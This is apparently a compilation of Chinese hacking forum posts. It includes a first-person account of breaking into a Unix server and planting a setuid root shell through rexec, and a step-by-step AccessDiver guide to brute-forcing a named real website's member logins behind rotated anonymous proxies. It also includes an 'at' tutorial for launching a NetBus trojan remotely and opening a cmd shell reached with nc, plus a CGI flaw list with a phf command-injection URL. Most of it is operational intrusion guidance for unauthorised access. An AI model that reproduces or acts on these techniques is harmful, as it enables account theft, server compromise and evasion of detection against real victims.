unix系统,从PASSWD看得出里面的用户只有两个组:root和users,我猜中的就是一users级别的,发现这个级别的用户几乎没有什么权限,TELNET上去后发现/USR/USERS/XXX是各用户的HOME,而它们的属性全是drwx——,也就是说这里的用户是互不信任的关系(这一点大家在各免费主页服务器上经常可以看到),看来猜出再多用户级口令也没有用的。                                       root级的用户只有两名:root和shut.root我用john已跑了60多天,显然不可能再跑出来了,但幸运的是shut口令已跑出来了。我毫不犹豫的telnet上去——然后,网站就关闭了!@#~!#^%,我真笨,怎么没想到shut口令是干什么的?                                       网站很快就又开启了,我发现shut口令还是没改!这个网管是怎么当的,系统关了也不查一下原因!很显然,这个网站上只有root是有水平的,但他与服务器可能不在同地,对于开、关机之类的事情不能直接操纵,与是给当地的操作员一个root级帐号,然后在。profile文件中做了一个shell,使得帐号一登录就自动关系统。看看系统这么周密的设计,我想root设计这个shell时绝对关掉了path,所以我不打算在优先的path路径中放一同名的shell来阻止它。我如果能改掉这个文件再telnet上去不就是root级了吗?                     但是shut的HOME目录是drwx——,别的帐号根本进不去。没关系,我试试ftp,530 user shut access denined(被拒绝),users组可以ftp上去同样进不了shut目录。而且该网站根本就没有开WWW服务,怎么办?为这个网站陆陆续续研究了许久,我总是乐观的鼓励自己,“起码我已经知道几十种进不去的方法了……”。“真正的黑客从来都是把困难当作乐趣,敞开的大门你请他进他都不进呢!”如此六十多天过去了,只到有一天……                     我再一次用haktek扫描该网站,结果如下:Port 21 found. Desc='ftp' Port 23 found. Desc='telnet' Port 25 found. Desc='smtp' Port 79 found. Desc='finger' Port 111 found. Desc='portmap/sunrpc' Port 512 found. Desc='biff/exec' Port 513 found. Desc='login/who' Port 514 found. Desc='shell/syslog' Port 515 found. Desc='printer' Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.                     一个以前一直没有注意的Port 512引起我的注意,这个端口是什么时候开的?要知道它可以让用户不登录就可以运行服务器上的命令!!!赶紧试试!                     打开一个软件winrsh32,填入user和password,在命令中填上ls -la,点运行哇,文件全列出来了,剩下的就简单了:cp /bin/sh /tmp/.temp;chown root /tmp/.temp;chmod 4755 /tmp/.temp.然后再用那个破掉的user级帐号telnet,cd/tmp;。temp.当#映入眼帘时,心却往下一沉,我突然感到一丝落寂……可惜这个root一世小心,却毁在了让shut可以使用512端口上。看来破坏一个世界总是比建立一个世界简单……   39端口入侵139端口入侵139端口的入侵,主要是通过建立空连接,而获得用户名和共享名,接着用字典法或穷举法来猜测ADMINISTRATORS的密码,这样可获得最高权限。   解决方法:1、禁止匿名共享。   2、禁止管理共享。   1433端口入侵1433端口入侵1433端口的入侵,主要是利用MS SQL SERVER默认sa的密码是空,通过远程执行命令而达到目的,或通过穷举法猜测密码。 
 

【AccessDiver中文使用指南】AccessDiver中文使用指南
不知道那位朋友翻译写出来,收藏了N久,今天给大家转出来吧不错AccessDiver中文使用指南      
AccessDiver中文使用指南v1.0 By LordOne 一,前言 关于AD以及暴力破解ABC 什么是AD? AD是AccessDiver的简称,就象MicroSoft被称为 MS一样。AccessDiver是一个安全测试软件,官 方网站是www.accessdiver.com,作者叫Jean, 在Deny.de(一个著名的网络安全论坛)的 support版上经常可以看到他的身影,你可以在 那里向他提出关于这个软件使用和技术方面的疑 问。 就象战斗武器既可以防身,又可以发动攻击一样 ,AD作为一个优秀的安全测试软件同时,也是一 个表现极其出色的暴力破解软件。无论是破解标 准的弹出窗口加密网页,还是HTML加密网页,AD 都显得游刃有余。最难能可贵的是,和Ares这样 为专家级Cracker设计的破解软件不同,AD有着 友好的界面,非常容易上手,尤其适合初涉破解 的新手(Newbie)。当然,拥有强大而齐全功能 的AD同样适合老手使用。因此,AD成为目前互联 网上最受欢迎的暴力破解软件,也就顺理成章了 。 在官方网站www.accessdiver.com上你可以下载 到最新版的AD。目前最流行的版本是V4.76 Build 3044。小圈子里传播的V4.80 Build 3283 目前尚在测试阶段,有诸多Bug,不必使用。 为什么用AD这样的软件可以破解成功? 有很多新手问过我这个问题。在他们想来,随意 性的用户帐号和密码组合是一个天文数字,怎么 会被人从网络上用暴力测试手段获得呢? 答案其实可以从你自己身上找到。比方说,你在 公司里的英文名叫Jackie Li,你的信箱是 jackie-li@urcompany.com,密码是jackie0101 (因为你是元旦出生的)。现在,你又要申请一 个免费信箱,那么,想到的第一个帐号会是什么 呢?我想90%以上的概率会是jackie或者jackie -li。你很幸运,你用jackie-li在这个免费邮箱 服务器上注册成功了。接下来要设置密码,你想 到的第一个密码会是什么呢?我想90%以上的概 率会是jackie0101。好,现在,假定这个免费信 箱服务器的网络安全很烂,用户资料被盗,这个 黑客用得来的用户名和密码序列去测试你们公司 的邮件服务器,会发生什么情况呢?很明显,他 用jackie-li:jackie0101成功的进入了你的公司 信箱。这是一种成功破解的典型例子。 我们再来探讨一个例子。某天,你要把一个10多 兆的文件共享给一个朋友,邮件没办法发,就临 时到Yahoo申请了一个公文包,而你的朋友没有 Yahoo帐号,于是你就把公文包的帐号和密码告 诉了你的朋友。在这种情况下,你的帐号和密码 会怎样设置呢?很多人会设成诸如test:test、 abc:123、asdf:123456、zhangsan:lisi等等非 常易记的序列(当然,这里需要指出的是,诸如 admin、test、abc等帐号在Yahoo服务器是属于 稀缺资源,拥有者不可能设置这么简单的密码, 我用Yahoo做例子,只是打个比方而已)。于是 ,如果有窥视者正在侦测服务器,这些简单的序 列就轻而易举的被命中了。 现在理解了么?成功破解思路一:用A服务器上 的可用帐号密码序列去测试B服务器(当然,前 提是A服务器和B服务器有很大的相关性),注意 ,是“可用”,而不是“曾经可用”而现在已经 “死亡”的帐号密码序列;成功破解思路二:构 造特定服务器上最可能出现的帐号密码序列进行 测试,所谓“最可能”出现,既包括诸如 “abc:abc”这些通用的组合,也包括与服务器 内容紧密相关的组合。 使用AD进行暴力破解会产生安全问题么? 使用不当,当然会产生安全问题。最常见的情况 是,被频繁请求骚扰的服务器侦测出破解企图, 于是发出警报,启动反击程序,释放大量的Fake (虚假)应答,迷惑测试者,并记录一切攻击行 为。假定你使用的是固定IP(比方说,你下班后 在公司悄悄干活),这个IP就被记录并被通知相 关部门,你就吃不了兜着走了;假定你使用拨号 上网,临时IP也被记录并被通知相关ISP,ISP一 查记录,你也会吃不了兜着走。 所以,暴力破解的另一个关键要素就是:匿名代 理服务器。注意,代理服务器有很多种。很多代 理服务器表面上给你提供代理服务,却会悄悄的 把你的真实IP透露给那一头的服务器;另外一些 代理服务器则属于某些公司或者机构的网关 (gateway),处于网管高度的监控之下,你的 频繁造访很快会引起他的注意并切断你的攻击行 为。所以,有一个高质量的匿名代理服务器,也 是成功破解的一个前提条件。 有了大容量的破解字典和高质量的代理服务器, 就一定能用AD破解成功了么? 答案当然是“否”。从网上轻易得来的大容量字 典,通常是黑客抓来的整个加密帐号密码文件被 破译后构成的。这样的字典可能已经被人使用过 N次了。设想一下,如果你是Jackie,你的 jackie-li:jackie0101被人破解了,你会怎么做 ?很明显,你会气急败坏的把所有相关密码甚至 帐号更改掉。这样,jackie-li:jackie0101这个 序列还有存在的必要么?如果目标服务器要求所 有的用户名为数字,那么你的“abc:abc”序列 还有测试的必要么?如果目标服务器的帐号和密 码是随机产生并用邮件发送给用户的,你辛苦手 工构造的字典序列还有测试的必要么?如果目标 服务器用户数量少得可怜,你的字典再庞大又有 何用? 此外,即便你的字典和代理都是高质量的,可是 你设置有问题,轻易的被服务器探测到了你的攻 击行为,并迅速采取了防范措施,你还是会一无 所获。 所以,尽管暴力破解看起来很“傻瓜”,但也并 不是“傻瓜”就能做好的。 好了,闲扯这么多,该进入正题了。 AccessDiver中文使用指南(二) 二,破解前的准备 首先,确保你联入Internet,无论是拨号上网还 是局域网上网。网速越快越好,机器内存越大越 好(可以承受更多的并发测试线程)。 其次,确保你机器上安装了AccessDiver4.76。 如果还没装,就到www.accessdiver.com下载一 个并装上。安装过程非常简单,和普通的软件没 什么差别。AD可以在Windows系统(包括97、98 、ME、2000和XP)上安装,如果你是麦金托什用 户,你可以在视窗虚拟系统内运行它。 第三,确保你有一个测试目标。所谓的测试目标 ,首先是一个具体的服务器,比如 http://www.testserver.com/,其次是这个服务 器的加密区域入口地址,比如 http://www.testserver.com/members/,这个入 口地址有个特点,就是当你把它输入到浏览器的 URL栏位内,回车进入时,会弹出让你输入用户 名和密码的小窗口。如果你甚至还不知道该去破 解哪个站点,那么你读这篇文章做什么。 第四,确保你有一个有的放矢的破解字典 (wordlist)。字典是个文本文件,格式构成是 这样的:"用户名:密码",中间的冒号也可以是 空格,或者TAB键。如下面的序列: abc:123 user:password test:test admin:admin 注意,字典要有针对性。预先把不符合目标服务 器要求的序列删除,比方说,目标服务器要求用 户的帐号和密码控制在6到8位,你就应该把帐号 和密码长度小于6而大于8的序列去掉。关于如何 处理字典,我在后文中将有详细说明。如果你不 明白,就随便找个字典(甚至可以使用AD自带的 字典)先试验试验吧。另外一个重要问题是字典 该多大才合适?我的建议是,实在没必要用超过 一万行的字典进行胡乱测试!那是在浪费时间。 如果你大致上学会了使用AD,就应该想办法去搞 到命中率高的字典,而不是搞一个巨大无比(甚 至超过1M)的字典在那里耗时间。 第五,确保你有一个高质量的匿名代理服务器列 表。代理服务器的简单原理如下: 请求 请求 主机 <-->代理服务器<-->服务器 反馈 反馈 对你的主机而言,你外部连接的只是代理服务器 ,而不是目标服务器,同样,目标服务器的反馈 也是通过代理再传送给你的主机。这样做有两个 好处:第一,你的本地网管不会知道你在连接非 法网站(如果局域网有网管的话);第二,如果 你的攻击行为被目标服务器侦测到的话,暴露的 IP也只是代理服务器的地址,而不是你的主机IP 地址;第三,周期性的轮换代理服务器,攻击行 为被目标服务器发觉的概率就要小得多。所谓匿 名代理,就是无需你输入用户名和密码进行验证 就可以使用的那些代理,这往往是因为某些机构 的网管业务水平不到家或者疏忽所导致的。这就 是为什么匿名代理会很快死亡的原因,网管察觉 漏洞了嘛。不过,这个网管学乖了,还是有其他 蹩脚网管留下空子给你钻的J。 匿名代理服务器列表是个文本文件,构成格式是 这样的:"服务器IP地址(或者主机名):端口" 。可能你是个网络菜鸟,连端口是什么都不知道 ,没关系反正依样画葫芦就行。如下面的序列: 63.238.139.7:80 63.242.157.227:8080 http://www.harlemschoolofthearts.org:80 http://www.childrenpalace.edu.vn:3128 注意,尽管AD使用的代理服务器列表可以使用主 机名,如上面第三、第四个,但其他一些破解软 件(如Ares)可能必须使用数字IP,因此在处理 代理服务器的时候,尽量使用主机IP。如何得到 高质量的匿名服务器列表?这是一个很大的课题 ,我后面会讨论到。还有一个问题就是,代理服 务器列表需要多大才合适?这得看你的目标服务 器特点。如果目标服务器安全措施非常好,动不 动就把你的代理封掉,那代理当然是多多益善了 ;如果你的目标服务器用一个代理服务器就能搞 定,那就找一个最快的代理吧。另外,你的字典 越大,一般而言,需要的代理也越多。不过,好 的匿名代理是一种稀缺资源,所以,你更应该着 想的是怎样才能让你的代理不被封掉,而不是找 更多的代理。 第六,确保你有一个安全的环境。破解不是一件 光荣而可以到处炫耀的事情,所以能秘密就尽量 保持秘密吧。破解的时候,你其实可以做其他事 情,如下棋,聊天,喝茶,等等,或者干脆把显 示器关掉(当然,前提是破解软件的设置必须在 优化状态下,以确保运行无须监测)。 如果你第四,第五个条件无法达到,就到破解论 坛上向老手们要吧。 AccessDiver中文使用指南(三) 三,第一次启动AD "第一次"总是充满了新奇、刺激、和兴奋。现在 ,就开始你的第一次启动AD吧。 AD装完后,Windows桌面上会有一个绿色的骷髅 图标,双击它运行AD。接下来会跳出一个警示框 ,第二次运行就不会出现了。不必理会,单击进 入。 进入AD后,首先跳入眼帘的是AD的LOGO以及作者 的声明。单击LOGO,取消之。这个LOGO会在每次 启动AD的时候出现。你既然已经读过Jean的声明 了,就不必再费时间,因此可以设置一下,去掉 这个声明。这个我后文会说到。 我们来看一下AD的界面布局。从上往下从左往右 依次说明。 1,菜单 菜单有五项,除了第一项My Skill(技术等级选 择),其余的后面有专题讨论。尽管AD很容易上 手,但毕竟是一个复杂的软件,所以AD设置了三 个技术等级:Newbie(新手级),Familiar(熟 手级),Expert(专家级)。默认是新手级。拿 破仑有句话,叫"不想做将军的士兵不是好士兵" ,所以,第一次打开AD,你就把技术等级设置到 专家级吧。胆子大一些,步子迈得更大一些,别 怕,有我指导呢。AD设为专家级状态后,界面会 有一些变化,别在意。My Skill菜单里还有几个 简化模式(Custom Modes)可供选择,其实专家 级设定里都包含它们了,因此不必理会。 2,测试进度条 有"0%"字样的黑色框是进度条,表示你当前的测 试进展到什么程度了。 3,启动以及终止按钮 有闪电图标、"Standard"字样的是标准测试模式 按钮,最右边有"HTML"字样的是html测试模式按 钮,有手状图标、"Stop"的是终止测试的按钮。 测试有弹出窗口的加密网页,就是点击左边 的"Standard"按钮,而测试有HTML窗体的加密网 页,则点击右边的"HTML"按钮。对新手而言,点 击的就是左边那个"Standard"按钮了。 4,服务器入口地址(server) 在启动按钮中间的文本框(默认写着Type here the address of your secured web zone (http://.......)),是用来输入测试网站的入 口页面的,也就是会弹出窗口的那个网页链接, 比方“http://www.testserver.com/members/” 。当你做过一次测试后,AD会把测试的服务器地 址存下来,文本框右侧的下拉菜单可以查到最近 测试过的服务器。 5,测试速度(test speed) AD可以同时开99个测试线程,只要你的带宽和系 统资源可以承受的话。但事实上,大多数情况下 都不能开这么多线程,因为开太多线程会很容易 的被远端服务器所监测到,并启动反击程序,而 且,太多线程很容易使代理服务器被服务器所禁 掉。AD默认开50个线程,一般情况下需要调整。 用鼠标点住滚动条,就可以左右调整测试线程( Bots)数了。 Server和Test speed窗口周围还有一些小的快捷 按钮,这些以后会有说明。 6,广告栏 AD是个共享软件,无须注册,就放了两个广告而 已。你点击广告,广告条会消失,但下次启动AD 的时候,广告又会出现。不过为了支持一下Jean ,你不妨点击两下。 7,功能按钮和状态窗口 这部分是最主要的,我将结合实例给出说明。 AccessDiver中文使用指南(四) 四,第一次尝试破解 现在,你要进行你的第一次破解之旅了!!为了 使讲解更明了,我将使用真实服务器。选择谁做 测试目标呢?Karupspc!为什么选择它?呵呵, 谁让它是个大站呢,所谓枪打出头鸟么。 Karupspc的服务器地址是www.karupspc.com,我 们现在要找到它的注册用户入口地址。打开IE, 在浏览器URL内输入www.karupspc.com,回车, Karupspc的欢迎首页就出现了。点击声明下面的 “ENTER”进入下一页showme.htm。showme.htm 有很多花花绿绿的广告图片,不要被迷惑了去胡 乱点,注意页面底部,有三个按钮,分别是 “JOIN NOW”、“MEMBERS”和“WEBMASTERS” 。点击“MEMBERS”,进入登录页面login.htm。 在这一页,我们看到,该站提供了两种登录方式 ,我们需要的是主要的登录“Click Here for our Main Login”。如果你点击这个链接,就会 跳出一个登录窗口,让你输入用户名和密码。我 们现在需要的是这个链接的具体URL地址。 得到这个URL地址的方法有很多种,最常用一种 是用右键点开一个新窗口,再点弹出小窗口的“ 取消”键,页面返回出错信息,通常浏览器地址 栏内的URL就是我们所需要的;第二种是把鼠标 左键放在链接上,然后看浏览器的状态栏信息; 第三种(也是最万无一失的)就是直接查看 login.htm的HTML源代码。我们三种方法分别试 验。 用第一种方法,当点击了取消键后,要迅速点击 浏览器的“停止”键,否则页面会跳转到一个叫 “denied.htm”的出错网页。这样,我们就得到 了所需要的入口地址: http://www.karupspc.com/members/members.sh tml。用第二种方法,得到的结果和上面的一样 。用第三种方法,点击浏览器的“查看”—— > “源文件”,就得到了login.htm的源代码。通 过关键字“Main Login”就可以迅速定位: “Click Here for our Main Login” (http://www.karupspc.com/members/members.s html),于是目标也一样达到了。 好,得到了目标网站的会员入口地址,这是破解 的第一步。现在,打开AD,在AD的“Server”栏 位内输入 “http://www.karupspc.com/members/members. shtml”(用复制粘贴就可以了)。 接下来,我们要调整一下AD的测试速度。 Karupspc不是个烂站,它的反测试功能还是满强 大的,开过多的线程,会让你的代理服务器迅速 死光光。通常你对一个站点不了解的话,就保守 一些,把线程开少一些。比如这次就开10个。向 左移动滚动条,右边的数值会减小,到10左右停 下。 然后是装载字典。AD会默认装载你上次使用的字 典。如果你第一次使用AD,则它会装载一个自带 的字典(当然了,这个字典毫无价值)。按照如 下顺序点击功能按钮:Dictionary—— >Currently used——>Load a combo file,选 择你的字典文件并加载之。你可以看到下面有两 个黑色窗口,左边是用户名,右边是对应的密码 。窗口下面会给出该文件的路径和文件名,比如 “D:\tmp\wordlist.txt”。 字典装完了,接下来要设置和装载代理列表。注 意,下面的步骤极其重要! Proxy——>My list——>Use WEB proxies(一 定要选中该框)——>Rotate proxies () logins before swapping(一定要选中该框), logins前面的文本框内,输入2。 上面的步骤是什么意思呢,就是说这次测试,需 要使用代理服务器,每个代理使用两次(测试两 个帐号密码)就切换到下一个代理服务器,如此 循环往复的测试。一般而言,为保险起见, Rotate proxies的数值应为1到2个,当然,某些 网站你可以更大。继续设置。 Proxy skipping——>Change proxies on errors(4xx/5xx)(选中) Proxy skipping——>Change Proxies on fake replies(选中) Proxy skipping——>Change proxies on redirections(选中) Proxy skipping——>Change proxies on specific HTML keyword(不选) Proxy skipping——>Retry the user:pass again after skipping(不选) 上面是处理代理出错的选项。如果收到4xx或者 5xx的错误信息,如果收到虚假应答,如果遇到 网页转向,则略过该代理。所谓略过,就是本轮 测试中,该代理将不被使用(比方Rotate proxies值是100,某代理在第一次测试时遇到上 述出错信息,则该代理将不再做余下的99次测试 )。 Proxy error handling——>Don't use the proxy after it has been skipped(选中) Proxy error handling——>Continue to use timedout proxies(不选) 上述选项表示AD收到的某些错误信息,如403( 表示IP被目标服务器封了),404(表示主机与 代理的连接出了问题),5XX等,该代理将被剔 除出测试列表。 Reactivation (used when no more proxy available)——>Don't reactivate proxies (=stop process) 上述选项表示,如果所有代理都被剔除,测试终 止。该设置有一选项是“Reactive all proxies ”,就是重新激活所有被剔除的代理服务器(只 激活一次,因此不会陷入死循环),这一般是没 有必要的。 好,代理设置大致上就完成了,现在装载代理列 表。看AD最右侧数下来第二个打开文件样的按钮 ,那就是用来装载代理列表文件的。我的文件是 D:\tmp\proxylist.txt,装载后,列表就在窗口 内出现了。每个代理前面都有一个复选框,选中 则表示该代理将参与本次测试。我们当然要全部 选中了。鼠标右键单击右边第一个按钮,则所有 代理均被选中。现在,我们要选择一个代理作为 测试的起始代理,鼠标左键随便点击一个,加亮 就OK了。 除此之外,还有一个小地方需要设置。Settings ——>Access——>stop a security test after finding () weak logins,在这个选项下面,选 中“Never stop-continue untill the end” 。当然,你如果想成功一个就收手,那就不要选 择这个复选框了。。不过,其实可以随时点击 AD的“Stop”按钮停止测试的啊。 设置好了么?那就鼠标点击“Standard”按钮, 开始你的第一次破解历程吧! 一点击运行按钮,AD立刻会多了一个主功能按钮 “Progression”,点击它,你会看到黑色窗口 滚动的白色状态信息。上面的窗口,是监控线程 运行状态,下面左边的窗口,是返回代理服务器 的应答,下面右边的窗口,则是用来放置成功破 解信息的。每当有一个成功的测试结果,AD会发 出欢畅的声音通知你。注意,选中“Don't hide this section after a test completion”。这 样,当测试结束后,这个“Progression”窗口 还会存在,供你分析使用。测试过程中,鼠标左 键点击“Found logins”窗口内的weak login( 就是成果获取的用户名和密码),会弹出一个新 的浏览器窗口自动进行登录。 测试结束后,weak login自动保存到历史记录中 。History——>Weak logins found。双击其中 的任意一条历史记录,系统会打开浏览器窗口自 动登录。 你的初次破解历程感觉如何?呵呵。为了增加你 的信心,我在后面附了一个100行的字典列表( 大约有4、5个weak login),一个大约200行的 匿名代理列表(level1-level3,全?*杀?Karupspc接受),供你练习。注意,你的目的是 练习,测试成功后不要进了Karupspc就出不来, 这样会杀了那几个weak login,后面的练习者就 无法感受成功了!! AccessDiver中文使用指南(五)——砥?五,用AD处理代理服务器列表 在破解论坛上,经常有新手问,从哪里可以 找到大量匿名代理服务器。一般而言,有两 种方式: 第一种,自己用专门工具扫描IP网段寻找代 理。记得6年前,我还在念书的时候,就用一 个名叫ProxyHunter的小工具扫描CERNET, 以期能跳出CERNET这个小圈子。AD也提供 了Proxy Hunter,功能类似。Proxy——> Proxy Hunter,输入起始和结束IP地址, 就让机器自动搜索吧。自己找代理有个好处, 就是找到的代理只是较少Cracker或者就自 己一人使用,这样,代理死亡的几率就小得 多。不过,对于付费上网的朋友而言,这种 方式的代价就太昂贵了些。此外,整个网段 整个网段的扫描IP端口,会很容易的被警惕 的网管发觉,他们会采取相应反击措施,这 个也不可不防(这就是说,做这等事的时候, 最好也通过一个SOCKS代理,把自己的真实 IP隐藏起来)。 第二种,用工具到专门免费发布代理的网站 上抓取(leech)代理。Internet向来以共 享闻名,不管被共享的资源是合法的,还是 非法的。代理服务器也一样。很多网站会定 期的向外公布站长扫描得到的代理列表。你 到特定地址手工抓取当然也可以,但效率不 高。通常的方式是把许多公布代理列表的网 址链接放在某个文本文件内,再用专门软件 分析该网页并抓取代理。AD就提供了这个功 能,Proxy——>Web Proxy Leecher。现在, 我们来一次实战演习。 网站“http://www8.big.or.jp/~000/CyberSyndrome/” 提供匿名代理,其公布代理的网页有两个, 分别是http://www8.big.or.jp/~000/CyberSyndrome/pla2.html 和http://www8.big.or.jp/~000/CyberSyndrome/plb2.html。 建立一个文本文件proxyleechurl.txt, 存储类似的链接。在AD的Web Proxy Leecher 界面上,点击左侧打开文档图标(鼠标放上 去的时候,提示“Add URL site to the list from a file”), 弹出文件打开窗口,选择已建文件proxyleechurl.txt。 文件打开后,可以看到AD蓝底窗口内, 出现了上述两个链接,称为“zone”。 鼠标右键单击窗口左侧的带勾的选择键, 选中所有zone,然后点击下面的“Start Leeching” 键。AD会分析每个页面,并直接把代理部 分抓出来,显示在右侧的“Proxies Found” 黑色窗口内。然后点击右下角的存盘图标, 把得到的代理存成一个文本文件proxynocheck.txt, 以待分析。或者你也可以直接点击“Add these proxies in…—— >Add these proxies into the Proxy ANALIZER” 按钮,把这些代理直接放到AD的Proxy Analizer 中等待验证。 AD的Proxy Leecher大抵就是这样了。还有很 多其他的代理工具,其leeching功能也和AD类似。 通过AD的Proxy Leecher,现在,已经有了1000多 个匿名代理了。但是,这些代理并不是都好用的。 代理无效的原因很多,多数是因为网管发现了 问题,把漏洞弥补上了。因此,在使用之前, 需要对这些初步抓取来的代理进行验证。验证 主要有两个方面,第一个是看这个代理能否连通, 简单的Ping一下就可以了;第二个是看这个代理 的匿名程度如何,这就需要专门的程序代码进行 了。AD提供了代理验证的功能,Proxy——>Proxy ANALIZER。 进入AD代理验证界面,点击左侧输入文件的图标, 打开刚刚保存的proxynocheck.txt(如果刚才 直接把代理装进代理验证,就免了这个步骤了)。 可以看到,每个代理有以下几个属性:地址 (IP或者域名),端口(80,8080,3128等), IP地址,正确度,匿名度,延迟时间。选中所 有代理(任意选择一个,然后按键盘上的“a” 就可以了),先进行正确度校验。 点击右下角的Parameters键进行普通参数 设置。选中“Export only IP Adresses in your lists”,这样,AD会把代理格式 全部转换成“IP地址:端口”的形式。 “Auto-deletion of bad proxies after a test completion”,即自动删除坏的代理, 还是不要选中的好。因为有的时候如果你 的内部网络有问题,代理测试会全通不过, 这样会把好的代理也删掉。测试完后可以手工删除。 点击右下角的Special进行特殊参数设置。 可以看到有个项目叫“Use the Server URL above as the reference during the test”,就是说,测试连通的时候, 以你预先在服务器入口地址输入的URL为准, 而不是你的本地IP。确定选择第一项, “Don’t use this future”。为什么 要这样做呢?因为你现在要建立的是一个 普通的可用代理列表,而不是针对特定服 务器的。如果选择了第三项“The URL is password protected (Basic authentication)”, 则所有无法与该服务器连接的代理(包括 一些被该服务器禁掉但可以用于其他服务 器的代理)均被视为坏的。只有当你要测 试某个特定服务器时,才应该对通用的代 理列表进行特定验证。 另外,你还修改一下AD默认的代理超时设定 (左下角),把原来的15秒改得更短或者更长。 设置完之后,点击“Speed/Accuracy Tester” 进行测试。测试完毕后,点击“Delay”按钮, 把代理按延迟时间进行排序。无时间的,显然 不是超时(TimeOut)就是其他访问错误,因 此全部删掉。这里有个问题需要注意,如果你 测试下来,绝大部分结果是“#404-Connetion refused”,则很有可能你的内部网络有问 题,而不是代理有问题了,常见的原因是网 关掉包。除删除不能连通的之外,延迟太长, 也可以删掉。我通常只保留延迟在10000秒以 内的代理。如何删除?选 中要删的代理,点击“X”按钮。 现在,我大约得到了约一半可以连通的代理。 但是,这些代理的匿名程度如何,还需要进 行下一步的验证。 验证一个代理的匿名程度如何,需要通过一 些CGI脚本代码的校验,这些脚本通常叫 “ProxyJudge”,比如AD4.83默认的“http://www10.cds.ne.jp/~ktake/proxy/prxjdg.cgi”。 PJ一般也是由一些热心人士放在一些免 费的服务器上,经常会死掉,也属于稀缺 资源一类。 通过校验的匿名代理,一般分成如下5类, 分别是level1到level5,在AD的Anonymous 一栏内会标识。Level越小,匿名程度越高, 也就是越好。比如,level1的代理会被WEB 服务器当作一个普通IP。一般而言,破解普 通网站,从level1到level5都可以使用, 但是,一些特殊的站点,就需要level2以 上的代理了。 现在进行匿名度验证。选中所有刚才正确度 测试通过的代理,点击右下角“ProxyJudge”, 选中AD默认的PJ。如果你要更换,则在右下角 的URL栏内输入PJ地址,点击“+”,然后选 中你新增的PJ。点击“Confidentiality Tester”,开始匿名度测试。 测试完毕后,点击“Anonymous”,把代理进 行排序,然后删除非匿名代理。对TimeOut的 代理,则用其他的PJ再进行测试。测试完毕 后,把通过的代理另存一个文件。我通常只 保留level1到level3的代理。当然,level4 和level5的代理也是可以用的。 这里还有一个问题,就是代理服务器所处的 区域问题。一般而言,使用代理有一个原则, 就是不能用国内的,以免麻烦,尤其是使用 单位网络的。但是,AD没有这个区域测试判 断功能。这是一个缺憾。我常使用AATOOLS, 这是目前最好的代理测试软件 

【at命令及服务】at命令及服务 ytmjcf 发表于 2006-4-8 20:23:00 at: 排定在特定的日期和时间运行某些命令和程序。 运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。 C:》net start schedule Schedule 正在启动服务..... Schedulw 服务启动成功。 
AT [computername] [ [id] [/DELETE] /DELETE [/YES]] AT [computername] time [/INTERACTIVE] [ /EVERY:date[,...] /NEXT:date[,...]] "command" 
computername 指定远程计算机。 如果省略这个参数,命令会被排定在本机上运行。 id 指定给排定进度命令的识别号。 /delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。 /yes 用于删除所有作业,且不想在运行删除时显示确认信息 。 
time 指定命令运行的时间。 /interactive 允许作业在运行时,与用户通过桌面交互。 /every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。 如果省略日期,则默认为在每月的本日运行。 /next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。 
"command" 准备运行的 Windows NT 命令或批处理文件。
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe: 1 利用管理员登陆到目的服务器,方法为: net use x.x.x.xipc¥ "adminpwd" /user:"adminuser"(这里具体方法可参见KILLUSA的文章《HOW TO GET IN NT》) 2 利用ntsrv.exe启动远程: netsvc x.x.x.x schedule /start 3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后: at x.x.x.x 00:00 ntsrv.exe /port:64321 其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:》winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功: Microsoft(R) Windows NT(TM)(C) Copyright 1985-1996 Microsoft Corp. C:》 
  

【at的启动方法】为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行
net start schedule
【CGI 安全漏洞资料速查】CGI 安全漏洞资料速查 日期:2003年10月10日 
类型:攻击型 名字:phf 风险等级:中 描述:在 NCSA 或者 Apache(1.1.1版本以内)非商业版本的 WebServer 中    有一段程序 util.c,允许黑客以 root 身份执行任何一个指令:       http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here 建议:无 解决方法:把 Apache Webserver 升级到 1.1.1 以上,或者将 NCSA Webserver      升级到最新版本 
类型:攻击型 名字:wguset.exe 风险等级:中 描述:如果您使用 NT 做为您的 WebServer 的操作系统,而且 wguest.exe 存    在于您的 Web 可执行目录中的话,入侵者将能利用它阅读到您的硬    盘上所有 USR_ 用户能阅读的文件 建议:将 wguset.exe 从你的 Web 目录移走或删除 解决方法:将 wguset.exe 从你的 Web 目录移走或删除 
类型:攻击型 名字:rguset.exe 风险等级:中 描述:如果您使用 NT 做为您的 WebServer 的操作系统,而且 rguest.exe 存    在于您的 Web 可执行目录中的话,入侵者将能利用它阅读到您的硬    盘上所有 USR_ 用户能阅读的文件 建议:将 rguset.exe 从你的 Web 目录移走或删除 解决方法:将 rguset.exe 从你的 Web 目录移走或删除 
类型:攻击型 名字:perl.exe 风险等级:低 描述:在cgi-bin 执行目录下存 在perl.exe,这属于严重的配置错误。黑客    可以在 perl.exe 后面加一串指令,利用浏览器在 server 上执行任何    脚本程序 建议:perl.exe 是放在任何带执行权限的 web 目录下都是不安全的 解决方法:在 web 目录下移除 perl.exe 这个程序. 
类型:攻击型 名字:shtml.exe 风险等级:低 描述:如果您使用 FrontPage 作为您的 WebServer,那么入侵者能够利用    IUSR_ 用户和 shtml.exe 入侵您的机器,做您不希望的事 建议:将 shtml.exe 从你的 Web 目录移走或删除 解决方法:将 shtml.exe 从你的 Web 目录移走或删除 
